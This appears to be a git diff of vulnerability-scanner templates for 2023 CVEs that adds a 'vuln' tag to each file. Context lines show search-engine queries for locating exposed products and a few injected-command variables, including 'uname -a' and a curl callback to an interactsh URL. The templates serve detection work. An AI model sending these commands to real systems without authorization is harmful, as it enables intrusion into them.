product: tablesome framework: wordpress - tags: cve2023,cve,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple + tags: cve2023,cve,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1892.yaml b/http/cves/2023/CVE-2023-1892.yaml index 11e6504cced..8c5592b432f 100644 --- a/http/cves/2023/CVE-2023-1892.yaml +++ b/http/cves/2023/CVE-2023-1892.yaml @@ -27,7 +27,7 @@ info: - title="Sidekiq" - title="sidekiq" google-query: intitle:"sidekiq" - tags: cve,cve2023,sidekiq,contribsys,xss + tags: cve,cve2023,sidekiq,contribsys,xss,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-1893.yaml b/http/cves/2023/CVE-2023-1893.yaml index bbdc11f0f63..3e66d1782ea 100644 --- a/http/cves/2023/CVE-2023-1893.yaml +++ b/http/cves/2023/CVE-2023-1893.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: login_configurator_project product: login_configurator - tags: cve,cve2023,wp,wp-plugin,wordpress,xss,login_configurator + tags: cve,cve2023,wp,wp-plugin,wordpress,xss,login_configurator,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-20073.yaml b/http/cves/2023/CVE-2023-20073.yaml index f85b0460362..bc1cb9c4d98 100644 --- a/http/cves/2023/CVE-2023-20073.yaml +++ b/http/cves/2023/CVE-2023-20073.yaml @@ -32,7 +32,7 @@ info: fofa-query: - app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" - app="cisco-rv340" || app="cisco-rv340w" || app="cisco-rv345" || app="cisco-rv345p" - tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive,vkev + tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive,vkev,vuln variables: html_comment: "" # Random string as HTML comment to append in response body diff --git a/http/cves/2023/CVE-2023-2009.yaml b/http/cves/2023/CVE-2023-2009.yaml index b6cfa6da2f7..f89e7876746 100644 --- a/http/cves/2023/CVE-2023-2009.yaml +++ b/http/cves/2023/CVE-2023-2009.yaml @@ -24,7 +24,7 @@ info: vendor: pretty_url_project product: pretty_url framework: wordpress - tags: cve2023,cve,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project + tags: cve2023,cve,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-20198.yaml b/http/cves/2023/CVE-2023-20198.yaml index fbecd833892..0e7f8fbc5e0 100644 --- a/http/cves/2023/CVE-2023-20198.yaml +++ b/http/cves/2023/CVE-2023-20198.yaml @@ -21,7 +21,7 @@ info: vendor: cisco product: ios_xe shodan-query: http.html_hash:1076109428 - tags: cve,cve2023,cisco,rce,router,iot,network,kev,vkev + tags: cve,cve2023,cisco,rce,router,iot,network,kev,vkev,vuln variables: cmd: 'uname -a' diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml index 57ab998d7be..5c0a020bf44 100644 --- a/http/cves/2023/CVE-2023-2023.yaml +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -29,7 +29,7 @@ info: vendor: kunalnagar product: custom_404_pro framework: wordpress - tags: cve2023,cve,wpscan,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar + tags: cve2023,cve,wpscan,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index b97c5ac5741..c058f5acb9b 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -30,7 +30,7 @@ info: - app="DedeCMS" - app="dedecms" - body="dedecms" - tags: cve,cve2023,dedecms,lfi,vkev + tags: cve,cve2023,dedecms,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-20864.yaml b/http/cves/2023/CVE-2023-20864.yaml index 9b02a9cf5ce..ffe5eac1656 100644 --- a/http/cves/2023/CVE-2023-20864.yaml +++ b/http/cves/2023/CVE-2023-20864.yaml @@ -32,7 +32,7 @@ info: - http.title:"vrealize log insight" fofa-query: title="vrealize log insight" google-query: intitle:"vrealize log insight" - tags: cve2023,cve,vmware,aria,rce,oast + tags: cve2023,cve,vmware,aria,rce,oast,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml index 8559c34f0a8..9b90210ba31 100644 --- a/http/cves/2023/CVE-2023-20887.yaml +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -41,7 +41,7 @@ info: google-query: - intitle:"vmware aria operations" - intitle:"vmware vrealize network insight" - tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev,vkev + tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev,vkev,vuln variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml index 8b93526d242..e4ee2a01d21 100644 --- a/http/cves/2023/CVE-2023-20888.yaml +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -36,7 +36,7 @@ info: google-query: - intitle:"vmware aria operations" - intitle:"vmware vrealize network insight" - tags: cve2023,cve,vmware,aria,rce,authenticated,oast + tags: cve2023,cve,vmware,aria,rce,authenticated,oast,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml index e623083cce1..70b93ef2ae0 100644 --- a/http/cves/2023/CVE-2023-20889.yaml +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -37,7 +37,7 @@ info: google-query: - intitle:"vmware aria operations" - intitle:"vmware vrealize network insight" - tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive + tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive,vuln variables: payload: location='http://{{interactsh-url}}' diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index a900aff7884..3c01a21db1e 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -25,7 +25,7 @@ info: vendor: 10web product: image_optimizer framework: wordpress - tags: cve2023,cve,wpscan,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web + tags: cve2023,cve,wpscan,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index 8b4d3f6923c..256bc5a3daf 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system - tags: time-based-sqli,cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project + tags: time-based-sqli,cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index d8a9dddd092..e7375fdd748 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -28,7 +28,7 @@ info: vendor: aajoda product: aajoda_testimonials framework: wordpress - tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda + tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-22047.yaml b/http/cves/2023/CVE-2023-22047.yaml index 3a4dd0bbc30..794a755d84d 100644 --- a/http/cves/2023/CVE-2023-22047.yaml +++ b/http/cves/2023/CVE-2023-22047.yaml @@ -24,7 +24,7 @@ info: shodan-query: http.title:"oracle peoplesoft enterprise" fofa-query: title="oracle peoplesoft enterprise" google-query: intitle:"oracle peoplesoft enterprise" - tags: cve,cve2023,oracle,peoplesoft,lfi + tags: cve,cve2023,oracle,peoplesoft,lfi,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index ae670ce3f3e..dd1c00155f6 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -29,7 +29,7 @@ info: - http.title:"openvpn connect" fofa-query: title="openvpn connect" google-query: intitle:"openvpn connect" - tags: packetstorm,cve2023,cve,adobe,lfd,download + tags: packetstorm,cve2023,cve,adobe,lfd,download,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index 9e5ee1cc328..da8e7903648 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -24,7 +24,7 @@ info: vendor: 10web product: seo framework: wordpress - tags: cve2023,cve,wpscan,packetstorm,wp,wordpress,wp-plugin,xss,seo,10web,authenticated + tags: cve2023,cve,wpscan,packetstorm,wp,wordpress,wp-plugin,xss,seo,10web,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml index ae09501e276..a6f90383df7 100644 --- a/http/cves/2023/CVE-2023-2227.yaml +++ b/http/cves/2023/CVE-2023-2227.yaml @@ -29,7 +29,7 @@ info: - "body=\"Modoboa\"" - body="modoboa" - icon_hash=1949005079 - tags: cve,cve2023,modoboa,exposure,disclosure + tags: cve,cve2023,modoboa,exposure,disclosure,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml index 74e77eddf4f..80b6b9e912b 100644 --- a/http/cves/2023/CVE-2023-22432.yaml +++ b/http/cves/2023/CVE-2023-22432.yaml @@ -29,7 +29,7 @@ info: product: web2py shodan-query: http.favicon.hash:-1680052984 fofa-query: icon_hash=-1680052984 - tags: cve,cve2023,web2py,redirect,authenticated + tags: cve,cve2023,web2py,redirect,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index e65b4f14a11..83a3c984db1 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -34,7 +34,7 @@ info: fofa-query: - "kubepi" - body="kubepi" - tags: cve,cve2023,kubepi,k8s,auth-bypass,fit2cloud,vkev + tags: cve,cve2023,kubepi,k8s,auth-bypass,fit2cloud,vkev,vuln variables: name: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index 5ce7e48eb1a..bb10605b3fa 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -35,7 +35,7 @@ info: fofa-query: - "kubepi" - body="kubepi" - tags: cve2023,cve,kubepi,k8s,exposure,fit2cloud,vkev + tags: cve2023,cve,kubepi,k8s,exposure,fit2cloud,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index 689fcc99093..1fde880ebdf 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -36,7 +36,7 @@ info: - app="KubeOperator" - body="kubeoperator" - app="kubeoperator" - tags: cve2023,cve,kubeoperator,k8s,kubeconfig,exposure,fit2cloud + tags: cve2023,cve,kubeoperator,k8s,kubeconfig,exposure,fit2cloud,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index b4cc0cb1d43..11c78de36d0 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -30,7 +30,7 @@ info: fofa-query: - app="ATLASSIAN-Confluence" - app="atlassian-confluence" - tags: cve2023,cve,confluence,auth-bypass,kev,intrusive,atlassian,vkev + tags: cve2023,cve,confluence,auth-bypass,kev,intrusive,atlassian,vkev,vuln variables: username: "{{rand_base(10)}}" password: "{{rand_base(10)}}" diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index 6f93024aab7..119014a1a6c 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -31,7 +31,7 @@ info: - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts. - tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev,vkev + tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index 9516b95273c..7d89d1bbd01 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -27,7 +27,7 @@ info: vendor: wpwax product: directorist framework: wordpress - tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated,wpwax + tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated,wpwax,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index 47e30b3856f..be4cc055524 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -29,7 +29,7 @@ info: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" - tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev,atlassian,vkev + tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev,atlassian,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2256.yaml b/http/cves/2023/CVE-2023-2256.yaml index 9e6ce31b6df..a85f4d1c696 100644 --- a/http/cves/2023/CVE-2023-2256.yaml +++ b/http/cves/2023/CVE-2023-2256.yaml @@ -22,7 +22,7 @@ info: vendor: WordPress product: woocommerce-product-addon fofa-query: body="wp-content/plugins/woocommerce-product-addon/" - tags: cve,cve2023,wp,wordpress,wp-plugin,xss,woocommerce,woocommerce-product-addon,authenticated + tags: cve,cve2023,wp,wordpress,wp-plugin,xss,woocommerce,woocommerce-product-addon,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index f262d2daeac..65b07f6ff9b 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -33,7 +33,7 @@ info: - http.title:"securepoint utm" fofa-query: title="securepoint utm" google-query: intitle:"securepoint utm" - tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint,vkev + tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-22621.yaml b/http/cves/2023/CVE-2023-22621.yaml index 5a71f5e8226..c3743df5708 100644 --- a/http/cves/2023/CVE-2023-22621.yaml +++ b/http/cves/2023/CVE-2023-22621.yaml @@ -26,7 +26,7 @@ info: vendor: strapi product: strapi shodan-query: html:"Welcome to your Strapi app" - tags: cve,cve2023,strapi,ssti,rce,intrusive,authenticated + tags: cve,cve2023,strapi,ssti,rce,intrusive,authenticated,vuln flow: http(1) && http(2) && http(3) && http(4) diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index 7ca2253838f..7cbbda6374b 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -28,7 +28,7 @@ info: vendor: tiempo product: tiempo framework: wordpress - tags: cve,cve2023,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tiempocom,tiempo + tags: cve,cve2023,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tiempocom,tiempo,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-22893.yaml b/http/cves/2023/CVE-2023-22893.yaml index 1e9b5188f1b..2071d29af75 100644 --- a/http/cves/2023/CVE-2023-22893.yaml +++ b/http/cves/2023/CVE-2023-22893.yaml @@ -25,7 +25,7 @@ info: vendor: strapi product: strapi fofa-query: app="strapi-Headless-CMS" - tags: cve,cve2023,strapi,authenticated,aws,cognito,vkev + tags: cve,cve2023,strapi,authenticated,aws,cognito,vkev,vuln variables: email: "{{email}}" diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index 361e2197115..ea5a8f0307a 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -34,7 +34,7 @@ info: - http.title:"securepoint utm" fofa-query: title="securepoint utm" google-query: intitle:"securepoint utm" - tags: cve,cve2023,securepoint,utm,exposure,memory,vkev + tags: cve,cve2023,securepoint,utm,exposure,memory,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-22952.yaml b/http/cves/2023/CVE-2023-22952.yaml index f9998fac78c..467c6b1f59a 100644 --- a/http/cves/2023/CVE-2023-22952.yaml +++ b/http/cves/2023/CVE-2023-22952.yaml @@ -31,7 +31,7 @@ info: - intext:"sugarcrm inc. all rights reserved" - intitle:"sugar setup wizard" - intitle:sugarcrm - tags: cve,cve2023,sugarcrm,rce,file-upload,intrusive,kev,vkev + tags: cve,cve2023,sugarcrm,rce,file-upload,intrusive,kev,vkev,vuln flow: http(1) && http(2) && http(3) diff --git a/http/cves/2023/CVE-2023-23063.yaml b/http/cves/2023/CVE-2023-23063.yaml index adb9b424b46..0ba20decff5 100644 --- a/http/cves/2023/CVE-2023-23063.yaml +++ b/http/cves/2023/CVE-2023-23063.yaml @@ -23,7 +23,7 @@ info: vendor: cellinx product: nvt_web_server fofa-query: body="/viewer/viewer.html" && header="lighttpd" && country="KR" - tags: cve,cve2023,cellinx,lfi,nvt,vkev + tags: cve,cve2023,cellinx,lfi,nvt,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-2309.yaml b/http/cves/2023/CVE-2023-2309.yaml index d72a340a27b..148f17b0934 100644 --- a/http/cves/2023/CVE-2023-2309.yaml +++ b/http/cves/2023/CVE-2023-2309.yaml @@ -26,7 +26,7 @@ info: product: wpforo_forum framework: wordpress publicwww-query: "/wp-content/plugins/wpforo/" - tags: cve,cve2023,wordpress,wpforo,wpscan,wp-plugin,wp,xss + tags: cve,cve2023,wordpress,wpforo,wpscan,wp-plugin,wp,xss,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 3e73f7b2d8b..f6d7e566057 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -32,7 +32,7 @@ info: fofa-query: - title="Art Gallery Management System" - title="art gallery management system" - tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project,phpgurukul + tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project,phpgurukul,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index 63a2bacea59..053daf6dccf 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -39,7 +39,7 @@ info: - body="solarview compact" && title="top" - icon_hash="-244067125" - body="solarview compact" - tags: cve,cve2023,packetstorm,solarview,rce,contec,vkev + tags: cve,cve2023,packetstorm,solarview,rce,contec,vkev,vuln variables: cmd: "echo+CVE-2023-23333|rev" diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index ec40ef3be40..a0f451bcdd6 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/paid-memberships-pro/ publicwww-query: /wp-content/plugins/paid-memberships-pro/ google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - tags: time-based-sqli,cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios,vkev + tags: time-based-sqli,cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index cc49b1f44e0..21ce5b37f9b 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -30,7 +30,7 @@ info: vendor: sandhillsdev product: easy_digital_downloads framework: wordpress - tags: time-based-sqli,cve,cve2023,easy-digital-downloads,unauth,wpscan,wordpress,wp,wp-plugin,sqli,tenable,sandhillsdev,vkev + tags: time-based-sqli,cve,cve2023,easy-digital-downloads,unauth,wpscan,wordpress,wp,wp-plugin,sqli,tenable,sandhillsdev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index 660e2e81867..e2e72d4e90e 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:/wp-content/plugins/quick-event-manager fofa-query: body=/wp-content/plugins/quick-event-manager publicwww-query: "/wp-content/plugins/quick-event-manager" - tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins + tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index 96adc6a6fae..04c6aa6fb9d 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -30,7 +30,7 @@ info: vendor: idehweb product: login_with_phone_number framework: wordpress - tags: cve2023,cve,login-with-phonenumber,wordpress,wp,wp-plugin,xss,tenable,idehweb + tags: cve2023,cve,login-with-phonenumber,wordpress,wp,wp-plugin,xss,tenable,idehweb,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 292802bf26b..bf01b16ee32 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -35,7 +35,7 @@ info: - app="mlflow" - title="mlflow" google-query: intitle:"mlflow" - tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects + tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects,vuln variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index 1ff0bf36395..cd00fddaf0b 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -33,7 +33,7 @@ info: - http.component:"joomla" - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" - tags: cve,cve2023,joomla,kev,vkev + tags: cve,cve2023,joomla,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index 07b1d0ac432..25fd73cdfc4 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -33,7 +33,7 @@ info: - http.favicon.hash:163538942 - http.favicon.hash:"163538942" fofa-query: icon_hash="163538942" - tags: cve,cve2023,cdata,rsb,ssrf + tags: cve,cve2023,cdata,rsb,ssrf,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index a5c48e0cf98..0ccc0b4b318 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -30,7 +30,7 @@ info: product: squidex shodan-query: http.favicon.hash:1099097618 fofa-query: icon_hash=1099097618 - tags: cve2023,cve,xss,squidex,cms,unauth,squidex.io + tags: cve2023,cve,xss,squidex,cms,unauth,squidex.io,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index 42ed95e6d58..e810ee6b43d 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -31,7 +31,7 @@ info: - html:"mojoPortal" - http.html:"mojoportal" fofa-query: body="mojoportal" - tags: cve,cve2023,cves,mojoportal,xss + tags: cve,cve2023,cves,mojoportal,xss,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-24367.yaml b/http/cves/2023/CVE-2023-24367.yaml index 289f5b1e53b..7f4e43bbac2 100644 --- a/http/cves/2023/CVE-2023-24367.yaml +++ b/http/cves/2023/CVE-2023-24367.yaml @@ -28,7 +28,7 @@ info: shodan-query: title:"T24 Sign in" product: t24 vendor: temenos - tags: cve,cve2023,xss,temenos + tags: cve,cve2023,xss,temenos,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index 6a8ae07fb12..9c3f855a976 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -33,7 +33,7 @@ info: - http.title:"citrix gateway" fofa-query: title="citrix gateway" google-query: intitle:"citrix gateway" - tags: cve2023,cve,citrix,xss,adc,vkev + tags: cve2023,cve,citrix,xss,adc,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index d26eda36e63..3394cb4bc3e 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -34,7 +34,7 @@ info: - http.title:"sharefile storage server" fofa-query: title="sharefile storage server" google-query: intitle:"sharefile storage server" - tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix,vkev + tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix,vkev,vuln variables: fileName: '{{rand_base(8)}}' diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 08636af0adf..0b722cc71a1 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -30,7 +30,7 @@ info: - html:"phpIPAM IP address management" - http.html:"phpipam ip address management" fofa-query: body="phpipam ip address management" - tags: cve2023,cve,xss,phpipam,authenticated + tags: cve2023,cve,xss,phpipam,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 2ab2378745d..fe88d375172 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="pmb group" - icon_hash=1469328760 - tags: cve,cve2023,unauth,xss,pmb,pmb_project,sigb,vkev + tags: cve,cve2023,unauth,xss,pmb,pmb_project,sigb,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 7a3f2e1d6e4..0186e24de2d 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="pmb group" - icon_hash=1469328760 - tags: cve2023,cve,redirect,pmb,pmb_project,sigb + tags: cve2023,cve,redirect,pmb,pmb_project,sigb,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index dddc27c40b0..25b280658f2 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -33,7 +33,7 @@ info: fofa-query: - body="pmb group" - icon_hash=1469328760 - tags: cve2023,cve,xss,pmb,pmb_project,sigb + tags: cve2023,cve,xss,pmb,pmb_project,sigb,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml index 7fcdc3838b1..f9822450680 100644 --- a/http/cves/2023/CVE-2023-2479.yaml +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: appium product: appium-desktop - tags: cve2023,cve,huntr,appium,oast,rce + tags: cve2023,cve,huntr,appium,oast,rce,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 10d21760167..60fb91c6e22 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -41,7 +41,7 @@ info: - intext:"Powered By vBulletin" - intitle:"powered by vbulletin" - intext:"powered by vbulletin" - tags: cve,cve2023,vbulletin,rce,vkev + tags: cve,cve2023,vbulletin,rce,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index e14fe7d2446..844e8dc13a8 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -36,7 +36,7 @@ info: - 